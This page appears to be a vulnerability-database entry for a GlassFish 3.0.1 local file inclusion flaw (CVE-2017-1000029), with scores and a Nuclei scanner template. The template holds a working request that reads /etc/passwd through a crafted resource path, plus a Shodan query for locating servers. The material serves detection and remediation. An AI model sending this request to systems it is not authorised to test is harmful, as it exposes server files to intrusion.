Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-1000029
HistoryApr 05, 2022 - 10:33 a.m.

Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion

2022-04-0510:33:13
ProjectDiscovery
github.com
15
oracle glassfish
open source
local file inclusion
vulnerability
remote attackers
unauthorized access
information disclosure
patches
updates

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.6

Confidence

High

EPSS

0.004

Percentile

73.4%

Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.

id: CVE-2017-1000029

info:
  name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
  reference:
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000029
    cwe-id: CWE-200
    epss-score: 0.00387
    epss-percentile: 0.70348
    cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: glassfish_server
    shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server"
  tags: cve,cve2017,glassfish,oracle,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/resource/file%3a///etc/passwd/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201d60e48b7384c0d1a88028a170cb3cfc91c63564ea817b87f9aa16c2e22f6277022100bd3d6df440665b69e2ed8f8e6bb14d03cea04068bdad5c4a9d18fbda46d3fe4d:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.6

Confidence

High

EPSS

0.004

Percentile

73.4%